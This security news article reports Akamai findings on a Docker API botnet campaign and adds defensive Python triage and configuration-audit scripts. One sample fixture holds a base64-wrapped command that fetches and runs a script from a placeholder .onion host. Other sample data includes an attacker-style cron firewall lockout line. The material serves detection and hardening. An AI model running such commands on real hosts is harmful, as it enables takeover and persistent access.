Docker API Exploits Evolve Into Botnet-Building Malware With Persistent Access

Attackers are shifting from cryptomining to building a multi-vector botnet that can replicate, persist, and prepare for broader attacks.

CSBadmin

A new wave of attacks targeting exposed Docker APIs is showing signs of evolving into a sophisticated botnet campaign. Originally spotted in June by Trend Micro, the activity was linked to attackers deploying cryptominers and using the Tor network to obscure their identities. Now, Akamai researchers report that the threat actors have updated their tooling with more dangerous payloads that focus on persistence, self-replication, and long-term control rather than quick resource hijacking.

The attack begins with scanning for Docker daemons whose remote API is reachable on TCP port 2375, the daemon's conventional plaintext port. The Docker API has no authentication of its own, so any client that can reach the port can create containers with the daemon's (root) privileges. Once a target is identified, the attackers send a container creation request that launches a modified Alpine Linux image whose start command is a base64-encoded shell script. That script installs tooling, starts a Tor daemon to anonymise the attacker's traffic, and confirms outbound connectivity by querying Amazon's checkip service. With Tor up, the compromised host downloads and executes a second-stage script, docker-init.sh, from a Tor hidden service.
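The initial foothold described above leaves a recognisable artifact on the host: a container whose start command is an `echo <base64> | base64 -d | sh` pipeline. The script below is an added example written for this article, not Akamai's tooling or the attackers' code. It reads records in the shape of `docker inspect` output, decodes any base64 blob piped through `base64 -d`, and matches the decoded text against the behaviours the article names (Tor, the checkip lookup, a .onion download, docker-init.sh, masscan/torsocks). The two inspect records, the placeholder script inside the first one, and the hostname example.onion are constructed for the example; the privileged/host-bind checks are general container hygiene, not something the article attributes to this campaign.

```python
import base64
import json
import re

# Constructed sample in the shape of `docker inspect` output, trimmed to the
# fields this triage reads. The first record mirrors the pattern the article
# describes (an Alpine container whose command is a base64-encoded shell
# script); its decoded content is a placeholder written for this example,
# not the real payload, and example.onion is a placeholder hostname.
_PLACEHOLDER_SCRIPT = (
    "apk add --no-cache tor curl >/dev/null; "
    "tor & sleep 5; "
    "curl -s checkip.amazonaws.com; "
    "curl -x socks5h://127.0.0.1:9050 http://example.onion/docker-init.sh | sh"
)
_B64 = base64.b64encode(_PLACEHOLDER_SCRIPT.encode()).decode()

SAMPLE_INSPECT = json.dumps([
    {
        "Id": "deadbeef0001",
        "Name": "/sleepy_worker",
        "Config": {"Image": "alpine:latest",
                   "Cmd": ["sh", "-c", f"echo {_B64} | base64 -d | sh"]},
        "HostConfig": {"Privileged": False, "Binds": []},
    },
    {
        "Id": "cafe00000002",
        "Name": "/web",
        "Config": {"Image": "nginx:1.27", "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Privileged": False,
                       "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
    },
])

# Behaviours named in the article, as regexes over the (decoded) command text.
INDICATOR_PATTERNS = {
    "tor-daemon": r"\btor\b",
    "checkip": r"checkip\.amazonaws\.com",
    "onion-service": r"\.onion\b",
    "docker-init": r"docker-init\.sh",
    "scan-tools": r"\bmasscan\b|\btorsocks\b",
}

_B64_PIPE = re.compile(r"echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)\b")


def decode_embedded_base64(cmd):
    """Decode every `echo <b64> | base64 -d` blob in a shell command.

    Returns the decoded texts (empty list when the pattern is absent)."""
    decoded = []
    for blob in _B64_PIPE.findall(cmd):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded


def triage_container(record):
    """Return the indicator names matched by one inspect record."""
    cmd = " ".join(record.get("Config", {}).get("Cmd") or [])
    layers = decode_embedded_base64(cmd)
    hits = ["base64-wrapped-shell"] if layers else []
    # Mask the raw blobs so indicator regexes only see real command text.
    searchable = "\n".join([_B64_PIPE.sub("echo <b64> | base64 -d", cmd)] + layers)
    hits += [name for name, pat in INDICATOR_PATTERNS.items() if re.search(pat, searchable)]
    # General container-hygiene checks; the article does not attribute these
    # settings to this campaign, but they turn an API compromise into a host one.
    host_cfg = record.get("HostConfig", {})
    if host_cfg.get("Privileged"):
        hits.append("privileged")
    if any(b.split(":")[0] == "/" for b in host_cfg.get("Binds") or []):
        hits.append("host-root-bind")
    return hits


def triage(inspect_json):
    """Map container name -> matched indicators, omitting clean containers."""
    findings = {}
    for record in json.loads(inspect_json):
        hits = triage_container(record)
        if hits:
            findings[record["Name"].lstrip("/")] = hits
    return findings


if __name__ == "__main__":
    # Feed real data with: docker inspect $(docker ps -aq) > inspect.json
    for name, hits in triage(SAMPLE_INSPECT).items():
        print(f"{name}: {', '.join(hits)}")
```

On a live host, pipe `docker inspect $(docker ps -aq)` into `triage()`. A single `base64-wrapped-shell` hit on its own is worth a look but is not proof; the combination with a Tor start and a .onion fetch is what distinguishes this campaign from an operator who merely obfuscated a long entrypoint.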

This second stage establishes persistent SSH access by adding an attacker-controlled public key to the root account's authorized_keys, then installs a cron job that runs every minute and re-applies a firewall rule blocking external access to the Docker API port. That closes the door the attacker came through, locking out defenders and anyone else while the attacker keeps the SSH foothold. The script also installs utilities such as masscan and torsocks for scanning, propagation, and evasion. A Zstandard-compressed Go binary is then retrieved, decompressed and executed; it functions as a dropper for additional malware components.
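Both persistence artifacts from the second stage can be checked from host data without any Docker tooling. The script below is an added example, not part of the article or Akamai's research: it fingerprints every key in a root authorized_keys file the way `ssh-keygen -lf` does (SHA256 over the decoded key blob) and reports keys absent from an allowlist, and it flags crontab entries that run every minute and reference a firewall tool together with the API port. The authorized_keys and crontab contents, the two ed25519 key bodies (syntactically valid, not real key pairs), and the comments are constructed for the example.

```python
import base64
import hashlib
import re
import struct


def _ssh_string(data):
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _fake_ed25519_line(fill_byte, comment):
    """Build a syntactically valid ssh-ed25519 authorized_keys line from a
    constant 32-byte body. Constructed for this example; not a real key pair."""
    blob = _ssh_string(b"ssh-ed25519") + _ssh_string(bytes([fill_byte]) * 32)
    return f"ssh-ed25519 {base64.b64encode(blob).decode()} {comment}"


ADMIN_KEY = _fake_ed25519_line(0x11, "ops@bastion")        # the one you provisioned
INTRUDER_KEY = _fake_ed25519_line(0x42, "root@localhost")  # the one you did not

# Constructed file contents standing in for /root/.ssh/authorized_keys and the
# output of `crontab -l -u root`. The cron line follows the article's
# description: a job every minute that re-applies a firewall block on 2375.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# managed by configuration management",
    ADMIN_KEY,
    INTRUDER_KEY,
    "",
])
SAMPLE_ROOT_CRONTAB = "\n".join([
    "0 3 * * * /usr/local/bin/backup.sh",
    "* * * * * iptables -I INPUT -p tcp --dport 2375 -j DROP >/dev/null 2>&1",
    "",
])


def ssh_fingerprint(line):
    """SHA256 fingerprint as `ssh-keygen -lf` prints it, e.g. 'SHA256:...'.

    Assumes the plain `type base64 [comment]` layout; lines carrying a leading
    options field (command=..., from=...) would need that field skipped first."""
    parts = line.split()
    if len(parts) < 2:
        return None
    digest = hashlib.sha256(base64.b64decode(parts[1])).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def unknown_keys(authorized_keys_text, allowed_fingerprints):
    """Return (fingerprint, comment) for every key not in the allowlist."""
    found = []
    for raw in authorized_keys_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fp = ssh_fingerprint(line)
        if fp and fp not in allowed_fingerprints:
            parts = line.split()
            found.append((fp, parts[2] if len(parts) > 2 else ""))
    return found


def lockout_cron_entries(crontab_text, port=2375):
    """Return commands scheduled every minute that touch a firewall rule for `port`."""
    hits = []
    for raw in crontab_text.splitlines():
        if raw.lstrip().startswith("#"):
            continue
        fields = raw.split(None, 5)
        if len(fields) < 6:
            continue
        every_minute = fields[:5] == ["*"] * 5
        cmd = fields[5]
        touches_firewall = re.search(r"\b(iptables|ip6tables|nft|ufw)\b", cmd)
        names_port = re.search(rf"\b{port}\b", cmd)
        if every_minute and touches_firewall and names_port:
            hits.append(cmd)
    return hits


def triage_host(authorized_keys_text, crontab_text, allowed_fingerprints):
    """Combine both checks into one report for a host."""
    return {
        "unknown_root_keys": unknown_keys(authorized_keys_text, allowed_fingerprints),
        "api_lockout_cron": lockout_cron_entries(crontab_text),
    }


if __name__ == "__main__":
    # On a live host: read /root/.ssh/authorized_keys and the output of
    # `crontab -l -u root`; the allowlist comes from your provisioning data.
    report = triage_host(SAMPLE_AUTHORIZED_KEYS, SAMPLE_ROOT_CRONTAB,
                         {ssh_fingerprint(ADMIN_KEY)})
    for key, value in report.items():
        print(f"{key}: {value}")
```

Two caveats for real use: files under /etc/cron.d carry a user field between the schedule and the command, so shift the split by one there, and `*/1` in the minute field means the same as `*`. Comparing fingerprints rather than raw lines is deliberate: an attacker can change the comment, but not the fingerprint, without changing the key.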

The Go binary demonstrates botnet-building behavior. It scans for other exposed Docker APIs and attempts to infect them using the same method, while also removing containers deployed by rival attackers. This self-replication model aligns with typical botnet operations, where each infected node autonomously spreads the infection to new targets.

Researchers also found dormant code for logging in to Telnet services on port 23 with default credentials and for interacting with Chrome's remote debugging interface on port 9222. These unused functions hint at planned expansion into credential theft, browser hijacking, remote file access, and distributed denial-of-service (DDoS) attacks.

Akamai concludes that the tooling is an early-stage version of a more complex botnet framework. While the current version is not fully developed, the trajectory suggests a shift from opportunistic Docker exploitation to a multi-vector platform with persistence, lateral movement, and the groundwork for advanced attacks.

For organizations running Docker, the lesson is concrete: never expose the Docker API directly to the internet. Keep the daemon on its local unix socket unless remote access is genuinely required, and where it is, serve the API only over mutual TLS (tlsverify) on a network path restricted to known management hosts. Monitor for the behaviours described here: unexpected container creation, base64-wrapped start commands, new root SSH keys and cron entries, and outbound Tor traffic from Docker hosts. Left unsecured, these endpoints add infrastructure to a growing botnet that may soon expand beyond cryptomining into credential theft and disruptive DDoS campaigns.
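The exposure at the root of this campaign is a one-line configuration choice. As an added example (not from the article, Akamai, or the Docker project), the script below holds a weak daemon.json beside a hardened one and audits each: a `tcp://` listener without `tlsverify` is the open door, 2375 is the conventional plaintext port that the scanners probe, and a bind to every interface is flagged as something to restrict even when mTLS is on. The daemon.json contents and the certificate paths under /etc/docker are constructed placeholders.

```python
import json

# Constructed daemon.json contents for this added check. The weak one is the
# exposure the article describes: the API served in plaintext on TCP 2375 with
# nothing to stop a remote client from creating containers. The hardened one
# keeps the local unix socket and serves the remote API only over mutual TLS on
# 2376; the certificate paths are placeholders.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tls": True,
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})
SOCKET_ONLY_DAEMON_JSON = json.dumps({"hosts": ["unix:///var/run/docker.sock"]})


def audit_daemon_config(daemon_json_text):
    """Return (severity, message) findings for a daemon.json; [] when the API
    is not reachable over TCP at all."""
    cfg = json.loads(daemon_json_text)
    findings = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return findings
    if not cfg.get("tlsverify"):
        # `tls: true` alone only encrypts; tlsverify is what demands a client
        # certificate signed by the CA before the daemon will talk.
        findings.append(("high", "TCP listener without tlsverify: any client that can "
                                 "reach the port can create containers, which is root on the host"))
    else:
        for key in ("tlscacert", "tlscert", "tlskey"):
            if not cfg.get(key):
                findings.append(("medium", f"tlsverify is set but {key} is not explicit; "
                                           "name the deployed certificate files"))
    for h in tcp_hosts:
        host, _, port = h[len("tcp://"):].rpartition(":")
        if port == "2375":
            findings.append(("medium", f"{h}: 2375 is the conventional plaintext API port "
                                       "and the one mass scanners probe; move to 2376 with mTLS"))
        if host in ("", "0.0.0.0", "[::]", "::"):
            findings.append(("low", f"{h}: bound to every interface; restrict reachability "
                                    "with a firewall or bind a management address"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON),
                        ("socket-only", SOCKET_ONLY_DAEMON_JSON)):
        print(label)
        for sev, msg in audit_daemon_config(text) or [("ok", "no TCP exposure")]:
            print(f"  [{sev}] {msg}")
```

One deployment caveat: on distributions whose docker.service unit already passes `-H fd://` to dockerd, setting `hosts` in daemon.json conflicts with that flag and the daemon refuses to start; the usual fix is a systemd drop-in that clears `ExecStart` and restarts dockerd without `-H`, leaving daemon.json as the single source of the listener list.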

Source: akamai.com